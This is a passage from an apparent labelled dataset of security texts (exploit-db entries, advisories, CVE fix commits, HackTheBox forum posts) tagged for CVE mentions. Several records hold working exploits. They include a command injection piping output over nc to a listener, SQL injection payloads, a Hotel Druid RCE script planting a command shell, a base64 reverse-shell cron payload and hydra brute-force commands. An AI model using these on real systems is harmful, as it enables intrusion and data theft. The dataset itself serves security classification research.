Chrome/96.0.4664.45 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Referer\": \"http://192.168.120.17/login.asp\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\nburp0_data = {\"login\": \"1\", \"user\": USERNAME, \"password\": PASSWORD}\nsession.post(burp0_url, headers=burp0_headers, data=burp0_data)\n\n# get our csrftoken\nburp0_url = f\"http://{TARGET}:{PORT}/saveUpgrade.asp\"\ndata = session.get(burp0_url)\n\ncsrftoken = data.text.split(\"?csrftoken=\")[1].split(\"\\\"\")[0]\n\nwhile True:\n\tCMD = input('x:')\n\tCMD_u = urllib.parse.quote_plus(CMD)\n\tfilename = ''.join(random.choice(string.ascii_letters) for _ in range(25))\n\n\ttry:\n\t\thack_url = f\"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}\"\n\n\t\tsession.get(hack_url, timeout=0.01)\n\texcept requests.exceptions.ReadTimeout:\n\t\tpass", "source": "exploitdb", "timestamp": "2022-11-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "cf246a134d62ad65510b", "text": "Fat Free CRM vulnerable to Exposure of Sensitive Information\n\n[Severity: MEDIUM]\n\nFat Free CRM before 0.12.1 does not restrict XML serialization, which allows remote attackers to obtain sensitive information via a direct request, as demonstrated by a request for `users/1.xml`, a different vulnerability than CVE-2013-7224.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "470c4b80a395079d02b6", "text": "Suprema BioStar 2 v2.8.16 - SQL Injection\n\n# Exploit Title: Suprema BioStar 2 v2.8.16 - SQL Injection\n# Date: 26/03/2023\n# Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/)\n# Vendor Homepage: https://www.supremainc.com/\n# Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp\n# Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide\n# Version: 2.8.16\n# Tested on: Windows, Linux\n# CVE-2023-27167\n\n## Description\nA Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through \"values\" JSON parameter.\n\n## Request PoC #1\n'''\nPOST /api/users/absence?search_month=1 HTTP/1.1\nHost: biostar2.server.net\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-GB,en;q=0.5\nAccept-Encoding: gzip, deflate\ncontent-type: application/json;charset=UTF-8\ncontent-language: en\nbs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548\nContent-Length: 204\nOrigin: https://biostar2.server.net\nConnection: close\nReferer: https://biostar2.server.net/\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"Query\":{\"offset\":0,\"limit\":51,\"atLeastOneFilterExists\":true,\"conditions\":[{\"column\":\"user_group_id.id\",\"operator\":2,\"values\":[\"(select*from(select(sleep(4)))a)\",4840,20120]}],\"orders\":[],\"total\":false}}\n\n'''\n\nTime based SQL injection (set 4 – response delays for 8 seconds).\n\n'''\n\n## Request PoC #2\n'''\nPOST /api/users/absence?search_month=1 HTTP/1.1\nHost: biostar2.server.net\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-GB,en;q=0.5\nAccept-Encoding: gzip, deflate\ncontent-type: application/json;charset=UTF-8\ncontent-language: en\nbs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548\nContent-Length: 188\nOrigin: https://biostar2.server.net\nConnection: close\nReferer: https://biostar2.server.net/\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"Query\":{\"offset\":0,\"limit\":51,\"atLeastOneFilterExists\":true,\"conditions\":[{\"column\":\"user_group_id.id\",\"operator\":2,\"values\":[\"1 and 3523=03523\",4840,20120]}],\"orders\":[],\"total\":false}}\n\n'''\n\nBoolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin)\n\n'''\n\n## Exploit with SQLmap\n\nSave the request from Burp Suite to file.\n\n'''\n---\nParameter: JSON #1* ((custom) POST)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: {\"Query\":{\"offset\":0,\"limit\":51,\"atLeastOneFilterExists\":true,\"conditions\":[{\"column\":\"user_group_id.id\",\"operator\":2,\"values\":[\"1 and 3523=03523\",4840,20120]}],\"orders\":[],\"total\":false}}\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: {\"Query\":{\"offset\":0,\"limit\":51,\"atLeastOneFilterExists\":true,\"conditions\":[{\"column\":\"user_group_id.id\",\"operator\":2,\"values\":[\"(select*from(select(sleep(7)))a)\",4840,20120]}],\"orders\":[],\"total\":false}}\n---\n[05:02:49] [INFO] testing MySQL\n[05:02:49] [INFO] confirming MySQL\n[05:02:50] [INFO] the back-end DBMS is MySQL\nback-end DBMS: MySQL > 5.0.0 (MariaDB fork)\n[05:02:50] [INFO] fetching database names\n[05:02:50] [INFO] fetching number of databases\n[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval\n[05:02:55] [INFO] retrieved: 2\n[05:03:12] [INFO] retrieved: biostar2_ac\n[05:03:56] [INFO] retrieved: information_schema\navailable databases [2]:\n[*] biostar2_ac\n[*] information schema\n\n'''", "source": "exploitdb", "timestamp": "2023-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "cb50ab881d7456c026d4", "text": "CVE: CVE-2022-1534\n\n[{'lang': 'en', 'value': 'Buffer Over-read at parse_rawml.c:1416 in GitHub repository bfabiszewski/libmobi prior to 0.11. The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.'}]\n\nFix commit: Fix array boundary check when parsing inflections which could result in buffer over-read with corrupt input", "source": "cvefixes", "timestamp": "2022-04-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "edfa8d7b5ade20980511", "text": "Thanks a lot @onthesauce ! Thought that I’ve already tried to do that yesterday. But with a fresh set of eyes today and your cp tips I’ve managed to get the flag. Happy hacking!", "source": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c5a90e5260d0cc5b9555", "text": "The task is to find a suitable list. Have a look at the page title. Can you find a vendor there? You have to bruteforce absolutely nothing", "source": "hackthebox", "timestamp": "2022-07-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "662697559cf4f6ce0088", "text": "CVE: CVE-2022-29248\n\n[{'lang': 'en', 'value': \"Guzzle is a PHP HTTP client. Guzzle prior to versions 6.5.6 and 7.4.3 contains a vulnerability with the cookie middleware. The vulnerability is that it is not checked if the cookie domain equals the domain of the server which sets the cookie via the Set-Cookie header, allowing a malicious server to set cookies for unrelated domains. The cookie middleware is disabled by default, so most library consumers will not be affected by this issue. Only those who manually add the cookie middleware to the handler stack or construct the client with ['cookies' => true] are affected. Moreover, those who do not use the same Guzzle client to call multiple domains and have disabled redirect forwarding are not affected by this vulnerability. Guzzle versions 6.5.6 and 7.4.3 contain a patch for this issue. As a workaround, turn off the cookie middleware.\"}]\n\nFix commit: [7.x] Fix cross-domain cookie leakage (#3018)\n\nCo-authored-by: Tim Düsterhus <209270+TimWolla@users.noreply.github.com>", "source": "cvefixes", "timestamp": "2022-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f71ecf30c911cf9a54fd", "text": "Which of the subdomains are zones? Each zone has one SOA entry https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/", "source": "hackthebox", "timestamp": "2022-11-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7c1556238756d59d9682", "text": "I was stuck there, too…think of what you usualy test on logins. When you can’t directly bypass an authentication, maybe you can use an automation-tool that gets you a dump of credentials.", "source": "hackthebox", "timestamp": "2023-01-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c393979366f19838d75a", "text": "Don't have fom submit in lab appoiment\n\nHello, i’m try to capture de flag in appoiment lab, but saw the code page html and the page don’t have form submit event. So, the page login no make nothing. Somebody make can capture the flag ? Regards,", "source": "hackthebox", "timestamp": "2022-05-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "544982fab797f9e6c7d1", "text": "CVE: CVE-2022-0501\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in Packagist ptrofimov/beanstalk_console prior to 1.7.12.'}]\n\nFix commit: Sanitize input", "source": "cvefixes", "timestamp": "2022-02-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d435a8ee6c65b966f488", "text": "I think you might be trying to do the same thing as me which I don’t know if it is possible, but that is to move the flag.txt to the directory so I could then open and read it. Instead however, I found it much easier to try and get the file to dump it’s contents to an error message.", "source": "hackthebox", "timestamp": "2023-01-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d23ebcd156b74253d92d", "text": "Hello mates, I’ve just finish the “ Skills Assessment - Service Login ” from the Login Brute Forcing module. As advice for the last exercise: Read carefully what is written in the question: As you now have the name of an employee, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. As you already know the employee name ** Create a custom username and password list Don’t forget to use sed to remove passwords: ** Shorter Than 8 ** With No Special Chars ** With No Numbers Use the correct syntax: ** hydra -L user.txt -P password.txt -u -f ssh://SERVER_IP:PORT -t 4 When you’ve got access to the ssh, then try to brute force the second user that can be found at /home/username hydra -l username -P rockyou-30.txt -u -f ftp://127.0.0.1 -t 4 And finally when you brute force the password, you can login with ssh user@IPADDRESS -p PORT and read the flag.txt from the home directory of the user.", "source": "hackthebox", "timestamp": "2022-04-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d63bda00761e22dbf6e6", "text": "Could you give us some additional hints how you were able to achieve it?", "source": "hackthebox", "timestamp": "2022-01-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8bbeae0f23509b637325", "text": "[Path Traversal] Unathenticated file read (CVE-2020-3452)\n\n**Description:**\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.\n\n\n## References\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\nhttps://www.rapid7.com/blog/post/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/\n\n## Impact\n\nImpact\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\n1.) Perform the following GET request:\nGET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1\nHost: ██████\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F\nConnection: close\nAccept: */*\nAccept-Language: en\nAccept-Encoding: gzip, deflate, br\n\n2.) The response will contain contents of portal_inc.lua\n\n## Suggested Mitigation/Remediation Actions\nCisco has released software updates that address this vulnerability.", "source": "hackerone", "timestamp": "2023-11-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "861e824c40bb662c1e34", "text": "SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)\n\n# Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)\n# Date: 7/4/2022\n# Exploit Author: Momen Eldawakhly (Cyber Guy)\n# Vendor Homepage: https://www.sma.de\n# Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R\n# Tested on: Linux [Firefox]\n# CVE : CVE-2021-46416\n\n# Proof of Concept\n\n============[ Normal user request ]============\n\nGET / HTTP/1.1\nHost: 192.168.1.4\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nCookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D\nUpgrade-Insecure-Requests: 1\n\n============[ Manipulated username request ]============\n\nGET / HTTP/1.1\nHost: 192.168.1.4\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nCookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D\nUpgrade-Insecure-Requests: 1", "source": "exploitdb", "timestamp": "2022-04-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "216217972c4b1b344834", "text": "How has this not been seen yet? I’m in. I’m pretty new but learning quickly. Been doing this and tryhackme for several months now. I have a pretty busy work week but I’d love to do stuff like this to learn faster. Hit me up on DMs if you’re interested.", "source": "hackthebox", "timestamp": "2022-04-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2401761aa21e85cfd604", "text": "SharpHound.ps1 doesn't work\n\nI’m trying Reel ( Hack The Box ). When I use SharpHound.ps1, the following error occurs everytime: nico@REEL C:\\Users\\nico>powershell -Exec Bypass Windows PowerShell Copyright (C) 2014 Microsoft Corporation. All rights reserved. PS C:\\Users\\nico> . .\\SharpHound.ps1 PS C:\\Users\\nico> Invoke-BloodHound -CollectionMethod All Exception calling \"Invoke\" with \"2\" argument(s): \"Method not found: '!!0[] System.Array.Empty()'.\" At C:\\Users\\nico\\SharpHound.ps1:642 char:88 + ... nvoke($Null, @(,$passed)) + ~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationExcep tion + FullyQualifiedErrorId : MissingMethodException This is the latest SharpHound.ps1. (I can’t use SharpHound.exe now)", "source": "hackthebox", "timestamp": "2022-11-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a534d6fd8afc706db690", "text": "CVE: CVE-2021-35939\n\n[{'lang': 'en', 'value': 'It was found that the fix for CVE-2017-7500 and CVE-2017-7501 was incomplete: the check was only implemented for the parent directory of the file to be created. A local unprivileged user who owns another ancestor directory could potentially use this flaw to gain root privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.'}]\n\nFix commit: Validate intermediate symlinks during installation, CVE-2021-35939\n\nWhenever directory changes during unpacking, walk the entire tree from\nstarting from / and validate any symlinks crossed, fail the install\non invalid links.\n\nThis is the first of step of many towards securing our file operations\nagainst local tamperers and besides plugging that one CVE, paves the way\nfor the next step by adding the necessary directory fd tracking.\nThis also bumps the rpm OS requirements to a whole new level by requiring\nthe *at() family of calls from POSIX-1.2008.\n\nThis necessarily does a whole lot of huffing and puffing we previously\ndid not do. It should be possible to cache secure (ie root-owned)\ndirectory structures to avoid validating everything a million times\nbut for now, just keeping things simple.", "source": "cvefixes", "timestamp": "2022-08-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c3c67345236ee6652be4", "text": "Hey, do we brute force for ssh or ftp for g.potter login?", "source": "hackthebox", "timestamp": "2022-03-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f2f5de5f23f09f3fbe2c", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8541, CVE-2018-8542, CVE-2018-8543, CVE-2018-8555, CVE-2018-8556, CVE-2018-8557, CVE-2018-8588.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "4fea7d196c221e933251", "text": "What is best way to deploy Sharphound-Bloodhound in multiple forest environments using one-way trusts?\n\nVery new to bloodhound/sharphound and have this deployment question: what is the best way to deploy bloodhound and sharphound to maximize info collection and also minimize deployment complexity in multiple forest/multiple domain AD environments built using one-way trusts between the forests. There are 9 forests involved configured in an “environment”/“security enclave” design construct where the environments have a protection scheme relationship of most trusted, next trusted, least trusted and then within each of these 3 “environments” the “security enclaves” (which are also forests) have a similar construct of most trusted to next trusted to least trusted. So e.g. if Sharphound were deployed in the most trusted environment forest and that environment’s most trusted enclave, is there a way for that Sharphound to see everything across all the 9 forests?", "source": "hackersploit", "timestamp": "2023-01-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8bb12bccd3f943ad1de0", "text": "Priv Esc in eScan antivirus 7.0.32\n\nContext: This software has a file mwavupdate which is a crontab script. It creates a symlink to /etc/cron.d to make system run update using cronjob runasroot is a SUID binary file that allows unprivileged user change permission of some certain files using chmod . The mwavupdate is in the list too → Attacker can change permission of mwavupdate , overwriting the crontab by a malicious task to execute system command as root Exploit demo that gains reverse shell (localhost) #!/bin/bash # Modify permission of crontab /opt/MicroWorld/sbin/runasroot chmod 777 /opt/MicroWorld/etc/mwavupdate # Modify crontab to run malicious command echo \"KiAqICogKiAqIHJvb3QgYmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTI3LjAuMC 4xLzg4ODggPCYxJwo=\" | base64 -d > /opt/MicroWorld/etc/mwavupdate /opt/MicroWorld/sbin/runasroot chmod 750 /opt/MicroWorld/etc/mwavupdate nc -nvlp 8888", "source": "parrotsec", "timestamp": "2023-06-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c54658bd2e9fa726c4b8", "text": "CVE: CVE-2021-41111\n\n[{'lang': 'en', 'value': 'Rundeck is an open source automation service with a web console, command line tools and a WebAPI. Prior to versions 3.4.5 and 3.3.15, an authenticated user with authorization to read webhooks in one project can craft a request to reveal Webhook definitions and tokens in another project. The user could use the revealed webhook tokens to trigger webhooks. Severity depends on trust level of authenticated users and whether any webhooks exist that trigger sensitive actions. There are patches for this vulnerability in versions 3.4.5 and 3.3.15. There are currently no known workarounds.'}]\n\nFix commit: Merge pull request from GHSA-mfqj-f22m-gv8j\n\nFix IDOR webhook get does not correctly authorize project", "source": "cvefixes", "timestamp": "2022-02-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "03bfcb6f7a2c602fd607", "text": "Hotel Druid 3.0.3 - Remote Code Execution (RCE)\n\n# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)\n# Date: 05/01/2022\n# Exploit Author: 0z09e (https://twitter.com/0z09e)\n# Vendor Homepage: https://www.hoteldruid.com/\n# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz\n# Version: 3.0.3\n# CVE : CVE-2022-22909\n\n#!/usr/bin/python3\nimport requests\nimport argparse\n\ndef login( target , username = \"\" , password = \"\", noauth=False):\n\tlogin_data = {\n\t\t\t\t\"vers_hinc\" : \"1\",\n\t\t\t\t\"nome_utente_phpr\" : username,\n\t\t\t\t\"password_phpr\" : password\n\t\t\t\t}\n\tif not noauth:\n\t\tlogin_req = requests.post(f\"{target}/inizio.php\" , data=login_data , verify=False )\n\t\tif ' ')[0]\n\t\t\tanno = login_req.text.split(' ')[0]\n\t\t\tret_data = {\"token\" : token , \"anno\" : anno}\n\t\t\t#print(\"ret data\" + ret_data)\n\t\t\treturn ret_data\n\t\telse:\n\t\t\treturn False\n\telse:\n\t\tlogin_req = requests.get(f\"{target}/inizio.php\" , verify=False )\n\t\ttry:\n\t\t\tanno = login_req.text.split(' ')[0]\n\t\t\ttoken = \"\"\n\t\t\tret_data = {\"token\" : token , \"anno\" : anno}\n\t\t\treturn ret_data\n\t\texcept:\n\t\t\treturn False\n\ndef check_privilege(target , anno , token=\"\"):\n\tpriv_req = requests.get(f\"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti\" , verify=False)\n\t#print(priv_req.text)\n\tif \"Modify\" in priv_req.text:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef add_room(target , anno , token=\"\"):\n\tadd_room_data = {\n\t\t\t\t\"anno\": anno,\n\t\t\t\t\"id_sessione\": token,\n\t\t\t\t\"n_app\":\"{${system($_REQUEST['cmd'])}}\",\n\t\t\t\t\"crea_app\":\"SI\",\n\t\t\t\t\"crea_letti\":\"\",\n\t\t\t\t\"n_letti\":\"\",\n\t\t\t\t\"tipo_tabella\":\"appartamenti\"\n\t\t\t\t}\n\tadd_req = requests.post(f\"{target}/visualizza_tabelle.php\" , data=add_room_data , verify=False)\n\t#print(add_req.text)\n\tif \"has been added\" in add_req.text:\n\t\treturn True\n\telse:\n\t\treturn False\ndef test_code_execution(target):\n\tcode_execution_req = requests.get(f\"{target}/dati/selectappartamenti.php?cmd=id\")\n\tif \"uid=\" in code_execution_req.text:\n\t\treturn code_execution_req.text.split(\"\\n\")[0]\n\telse:\n\t\treturn False\n\n\ndef main():\n\n\tbanner = \"\"\"\\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$\n| $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$\n| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \\ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$\n| $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$\n| $$__ $$| $$ \\ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \\__/| $$ | $$| $$| $$ | $$\n| $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$\n| $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$\n|__/ |__/ \\______/ \\___/ \\_______/|__/ |_______/ |__/ \\______/ |__/ \\_______/\\n\\nExploit By - 0z09e (https://twitter.com/0z09e)\\n\\n\"\"\"\n\n\n\tparser = argparse.ArgumentParser()\n\treq_args = parser.add_argument_group('required arguments')\n\treq_args.add_argument(\"-t\" ,\"--target\" , help=\"Target URL. Example : http://10.20.30.40/path/to/hoteldruid\" , required=True)\n\treq_args.add_argument(\"-u\" , \"--username\" , help=\"Username\" , required=False)\n\treq_args.add_argument(\"-p\" , \"--password\" , help=\"password\", required=False)\n\treq_args.add_argument(\"--noauth\" , action=\"store_true\" , default=False , help=\"If No authentication is required to access the dashboard\", required=False)\n\targs = parser.parse_args()\n\n\ttarget = args.target\n\tif target[-1] == \"/\":\n\t\ttarget = target[:-1]\n\tnoauth = args.noauth\n\n\tusername = args.username\n\tpassword = args.password\n\n\tif noauth == False and (username == None or password == None):\n\t\tprint('[-] Please provide the authentication method.' )\n\t\tquit()\n\n\tprint(banner)\n\tif not noauth:\n\t\tprint(f\"[*] Logging in with the credential {username}:{password", "source": "exploitdb", "timestamp": "2022-02-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "56fa2753305881ae60c7", "text": "CVE: CVE-2022-23620\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions AbstractSxExportURLFactoryActionHandler#processSx does not escape anything from SSX document references when serializing it on filesystem, it is possible to for the HTML export process to contain reference elements containing filesystem syntax like \"../\", \"./\". or \"/\" in general. The referenced elements are not properly escaped. This issue has been resolved in version 13.6-rc-1. This issue can be worked around by limiting or disabling document export.'}]\n\nFix commit: XWIKI-18819: It's possible to save pretty much anything anywhere by creating and using an SSX/JSX containing \"../\" in its reference", "source": "cvefixes", "timestamp": "2022-02-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7fbf44ceba5e2db88632", "text": "%26%26s’h%09<<<$(rev<<<“txt.galf/%09tac”) could be flagged as malicious because of the ‘/’. Slash was blacklisted for me. Also you probably can still use ${PATH:0:1}, sometimes certain payloads would get reflected back at me as well, even though I could use the strings in them. Maybe try a little more obfuscation around your commands. Most commands are blacklisted on this box.", "source": "hackthebox", "timestamp": "2022-10-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "323da159e9681796d389", "text": "Amazon Best Sellers in Security Certifications Parrot Community: looking for the holy grail of pdfs to educate oneself If I were completely new to networking, security, Linux and pentesting, I would get the basics down by preparing for and taking the following certifications to start off my penetration testing career: CompTIA Network+ (or Cisco Networking Fundamentals\\CCNA) CompTIA Linux+ (or Linux Professional Institute’s LPI1 and LPI2) CompTIA Security+ CompTIA Pentest+ (or many others) I would follow the CompTIA path as the certs (as most do) need to be renewed every 3 years to stay valid, but taking another CompTIA cert renews all the earlier ones taken. Free Network+ training videos: https://www.youtube.com/playlist?list=PLG49S3nxzAnmpdmX7RoTOyuNJQAb-r-gd Free Security+ training videos: https://www.youtube.com/playlist?list=PLG49S3nxzAnkL2ulFS3132mOVKuzzBxA8 Free Pentest+ training videos: https://www.youtube.com/playlist?list=PLqM63j87R5p4olmWpzqaXMhEP2zEnQhPD", "source": "parrotsec", "timestamp": "2022-01-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f8cd3666fdca297651af", "text": "I tried to follow your directions, but I keep getting “Folder is empty” in the File Manager using Burp Suite Repeater Here is what I tried (Spoiler) I tried both move and copy, url encoded ‘<<<’ (%3C%3C%3C), used to=tmp and without tmp. I’m not sure what I’m doing wrong. Spoiler", "source": "hackthebox", "timestamp": "2023-10-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "477330373c75cc5dc1aa", "text": "Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure\n\n# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure\n# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos\n\n\n# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter\n# Discovered by Ken 's1ngular1ty' Pyle\n\n\n# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter\n# Discovered by Ken 's1ngular1ty' Pyle\n\n\nimport requests\nimport re\nimport hashlib\nimport sys\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nif len(sys.argv) < 3:\n print(\"Usage: python cve-2019-15993.py URL passwordfile\")\n sys.exit()\n\nurl = sys.argv[1]\nfile = sys.argv[2]\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef hash_value(value):\n \"\"\"Calculate the SHA1 hash of a value.\"\"\"\n sha1 = hashlib.sha1()\n sha1.update(value.encode('utf-8'))\n return sha1.hexdigest()\n\ndef userName_parser(text, start_delimiter, end_delimiter):\n results = []\n iteration = 0\n start = 0\n while start >= 0:\n start = text.find(start_delimiter, start)\n if start >= 0:\n start += len(start_delimiter)\n end = text.find(end_delimiter, start)\n if end >= 0:\n results.append(text[start:end])\n start = end + len(end_delimiter)\n\n iteration = iteration + 1\n return results\n\n# retrieve the web page\nresponse = requests.get(url, allow_redirects=False, verify=False)\n\n# Read in the values from the file\nwith open(file, 'r') as f:\n values = f.readlines()\n\nvalues = [value.strip() for value in values]\nhashes = {hash_value(value): value for value in values}\n\nif response.status_code == 302:\n print(\"Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\\n\")\n url = response.headers[\"Location\"] + \"config/device/adminusersetting\"\n response=requests.get(url, verify=False)\n\n if 